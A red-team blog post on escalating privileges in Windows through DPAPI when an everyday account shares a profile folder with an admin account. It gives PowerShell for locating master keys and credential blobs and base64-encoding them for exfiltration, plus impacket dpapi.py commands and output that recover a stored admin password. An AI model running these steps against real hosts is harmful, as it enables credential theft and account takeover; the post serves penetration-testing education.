
Privilege Escalation via DPAPI

Red Team Security Windows

What’s DPAPI?

DPAPI stands for Data Protection API. It is a Windows API (CryptProtectData/CryptUnprotectData) that encrypts and decrypts arbitrary data with keys tied to a user or machine account, so applications can protect sensitive data (passwords, connection strings, private keys) without managing encryption keys themselves.

When you protect data with DPAPI under a user account, the blob is encrypted with one of that user's master keys, and the master key file is itself encrypted with a key derived from the user's password and SID. That is why only that Windows user can transparently decrypt the data after logging in, and it is also why anyone who holds the master key file together with the user's password (or, for domain accounts, the domain's DPAPI backup key) can decrypt it offline. Typical usages include:

  • Storing credentials in applications
  • Protecting private keys (e.g., in certificate stores)
  • Encrypting configuration files

Why should you care?

DPAPI becomes useful when you have an initial foothold on a Windows host and are looking to escalate privileges. More specifically, we are talking about a scenario where your initial-access user shares their home folder with a privileged account. This setup is commonly found in Active Directory environments: a single person operates two distinct accounts, one for everyday work and a dedicated one for administrative actions such as managing users and groups that require elevated privileges. That split follows the principle of least privilege and limits the damage if the everyday account is compromised.

However, if that separation is undermined by both accounts using the same profile folder under C:\Users\<name>, the DPAPI material stored in it (master key files and credential blobs, and with them any credentials saved for the privileged account) becomes readable by the everyday user, which opens the door to privilege escalation as soon as that user is compromised.
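To check whether a host actually has this setup before going any further, here is an added PowerShell snippet (mine, not from the original post). It assumes read access to the ProfileList registry key, which standard users have by default, and to the Protect folder of the profile you are sitting in; the function names are my own.

```powershell
# Added example (not from the original post): find accounts that share a
# profile directory on this host.

# Windows records every loaded profile under ProfileList\<SID> with its
# ProfileImagePath. Two SIDs resolving to the same path is the shared-profile
# misconfiguration described above.
function Get-SharedProfileDirs {
    $list = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList'
    Get-ChildItem $list | ForEach-Object {
        $p = Get-ItemProperty $_.PSPath          # expands %systemdrive% etc.
        [pscustomobject]@{ Sid = $_.PSChildName; Path = $p.ProfileImagePath }
    } |
    Where-Object { $_.Sid -like 'S-1-5-21-*' } |   # real users only, skip service SIDs
    Group-Object Path | Where-Object { $_.Count -gt 1 } |
    ForEach-Object {
        [pscustomobject]@{ Path = $_.Name; Sids = ($_.Group.Sid -join ', ') }
    }
}

# Second signal, visible from inside a profile: DPAPI creates one SID-named
# folder under Protect per account that ever protected data there. More than
# one such folder means more than one identity has used this profile.
function Get-DpapiOwnerSids {
    param([string]$Profile = $env:USERPROFILE)
    Get-ChildItem -Force -Directory (Join-Path $Profile 'AppData\Roaming\Microsoft\Protect') |
        Where-Object { $_.Name -like 'S-1-5-*' } |
        Select-Object -ExpandProperty Name
}

Get-SharedProfileDirs
Get-DpapiOwnerSids
```

An empty result from the first function does not clear the host: an administrator whose profile is redirected to the same folder through a roaming or home-directory setting will only show up through the second check, once that account has logged on and protected something.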

⚠️ Disclaimer: This post is for educational and ethical purposes only. It’s meant to help readers understand penetration testing and improve security. Do not use these techniques without explicit permission from the system owner. Unauthorized access or tampering is illegal, and the author is not responsible for misuse.

How to exploit?

I’m on a macOS machine, so my choice for interacting with DPAPI is the dpapi.py script from impacket. If it is not yet part of your toolchain, find impacket here. It lets you extract master keys and stored passwords offline, once the files have been copied off the target.

The location of the actual secrets file varies with the application that uses DPAPI. In my case, I found one at C:\Users\<name>\AppData\Roaming\Microsoft\Credentials, which is where Credential Manager stores domain credentials saved with cmdkey, runas /savecred or a "remember my credentials" checkbox (a second store exists under AppData\Local\Microsoft\Credentials). Both folders are hidden, so list them with dir /a or Get-ChildItem -Force.

If permissions somehow give you a hard time copying either the secret or the master key file to your local machine, use the old base64 trick: base64-encode the file on the target (certutil -encode or [Convert]::ToBase64String in PowerShell), copy the text from the console and decode it again locally. Do not paste the raw binary through a terminal: a single mangled byte will make dpapi.py fail to parse the file.
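The collection step, as an added PowerShell example that is not from the original post: it prints the SID the master key step below will need, lists the master key files and which of them is current, tells you which master key each credential blob was encrypted with, and base64-encodes a file for copy/paste. It assumes it runs on the target as the compromised user in Windows PowerShell 5.1 or later; the function names are my own, and the DPAPI blob layout it relies on (provider GUID, 4-byte master key version, master key GUID) is the documented one.

```powershell
# Added example (not from the original post): triage the DPAPI material in the
# current profile and prepare it for offline use with dpapi.py.

# 1. The SID that 'dpapi.py masterkey -sid' expects is the master key owner's.
#    For the current user it is:
$sid = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
"Current user SID : $sid"

# 2. Master key files sit in a folder named after that SID. Folder and files
#    carry the hidden+system attributes, hence -Force.
$protect = Join-Path $env:APPDATA "Microsoft\Protect\$sid"
Get-ChildItem -Force -File $protect | Where-Object { $_.Name -match '^[0-9a-f-]{36}$' } |
    ForEach-Object { "Master key file  : $($_.FullName) ($($_.Length) bytes)" }

# The 'Preferred' file starts with the GUID (16 bytes) of the master key
# currently in use, followed by its expiry as a FILETIME.
$preferred = Join-Path $protect 'Preferred'
if (Test-Path $preferred) {
    $b = [IO.File]::ReadAllBytes($preferred)
    "Preferred key    : $(New-Object System.Guid -ArgumentList (,[byte[]]$b[0..15]))"
}

# 3. Every DPAPI blob carries the well-known provider GUID
#    df9d8cd0-1501-11d1-8c7a-00c04fc297eb, then a 4-byte master key version,
#    then the GUID of the master key that encrypts it. Reading that GUID tells
#    you which master key file to decrypt when several exist.
function Get-DpapiMasterKeyGuid {
    param([Parameter(Mandatory)][string]$Path)
    $data = [IO.File]::ReadAllBytes($Path)
    $sig  = ([guid]'df9d8cd0-1501-11d1-8c7a-00c04fc297eb').ToByteArray()  # on-disk byte order
    for ($i = 0; $i -le $data.Length - 36; $i++) {
        $hit = $true
        for ($j = 0; $j -lt 16; $j++) {
            if ($data[$i + $j] -ne $sig[$j]) { $hit = $false; break }
        }
        if ($hit) {
            $mk = [byte[]]$data[($i + 20)..($i + 35)]   # skip signature (16) + version (4)
            return New-Object System.Guid -ArgumentList (,$mk)
        }
    }
    return $null
}

foreach ($dir in @((Join-Path $env:APPDATA 'Microsoft\Credentials'),
                   (Join-Path $env:LOCALAPPDATA 'Microsoft\Credentials'))) {
    if (-not (Test-Path $dir)) { continue }
    Get-ChildItem -Force -File $dir | ForEach-Object {
        "Credential blob  : $($_.FullName) -> master key $(Get-DpapiMasterKeyGuid $_.FullName)"
    }
}

# 4. Base64 a file for copy/paste exfiltration. The output has no line breaks,
#    so one selection in the console captures the whole file. Decode on macOS
#    with 'pbpaste | base64 -D > <file>' (or 'base64 -d' on Linux).
function ConvertTo-Base64File {
    param([Parameter(Mandatory)][string]$Path)
    [Convert]::ToBase64String([IO.File]::ReadAllBytes($Path))
}
# Example: ConvertTo-Base64File (Join-Path $protect 'Preferred') | Set-Clipboard
```

The master key GUID printed for each credential blob is the file name you pass to dpapi.py masterkey -file, and the SID printed first is its -sid argument; the credential file itself goes to dpapi.py credential -file. The scan in step 3 searches for the provider GUID rather than assuming a fixed header size, so it also works on DPAPI blobs stored by other applications.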

masterkey

To get credentials out of the DPAPI-protected file, you first need to extract the master key that encrypts it. To acquire the master key, you need the master key file and the SID of the user who owns it, i.e. the account whose password protects it (in this scenario the initial user, whose password you already have; it is not the SID of the account whose stored password you are after). Master key files live under C:\Users\<name>\AppData\Roaming\Microsoft\Protect\<SID>\ and are named by GUID, so if you don’t yet know the SID (from BloodHound reconnaissance, for example), the folder name gives it to you. The folder and its files are hidden and system-attributed, so list them with dir /a or Get-ChildItem -Force. If several master key files exist, running the credential command without -key dumps the blob header, including the GUID of the master key it needs. Then use the masterkey command to extract it:

dpapi.py masterkey \
	-file ~/tmp/9f3d8c64-5e41-4c2d-9b7a-8c2f45a7d219 \
	-sid 'S-1-5-21-3623811015-3361044348-30300820-1013'

After being prompted for the password of the master key’s owner (the initial user in this scenario; pass it non-interactively with -password if you prefer), you will be greeted with the master key. The non-zero DomainKeyLen in the output is the copy of the master key wrapped with the domain’s DPAPI backup key, which is the alternative route for someone holding that key:

Impacket v0.13.0.dev0+20250820.203717.835623ae - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 9f3d8c64-5e41-4c2d-9b7a-8c2f45a7d219
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Password:
Decrypted key with User Key (MD4 protected)
Decrypted key: 0x4f7a2b8c91d5e3f6a7b8c9d0e1f2a3b4c5d6e7f8910a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7081920a1b2c3d4e5f6

credential

With the key at hand you can immediately provide it to the credential command of dpapi.py to complete decryption:

dpapi.py credential \
	-file ~/tmp/7FA3C2184E1D4F7A9B8E23CDA6F52D4C \
	-key '0x4f7a2b8c91d5e3f6a7b8c9d0e1f2a3b4c5d6e7f8910a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7081920a1b2c3d4e5f6'

And voilà, just like that you have found another user’s password and can escalate your privileges. In the dump below, Username is the stored account, the last Unknown field is its plaintext password, and Target tells you where that credential is valid:

Impacket v0.13.0.dev0+20250820.203717.835623ae - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=FIGGO.LA
Description :
Unknown     :
Username    : ali.mcsnitcherson_admin
Unknown     : bestMuddaf***inGoddamnPasswordEv444!

Fin

That’s it for today and don’t forget kids:

🔥 Nobody get Pen’ned without the Consent!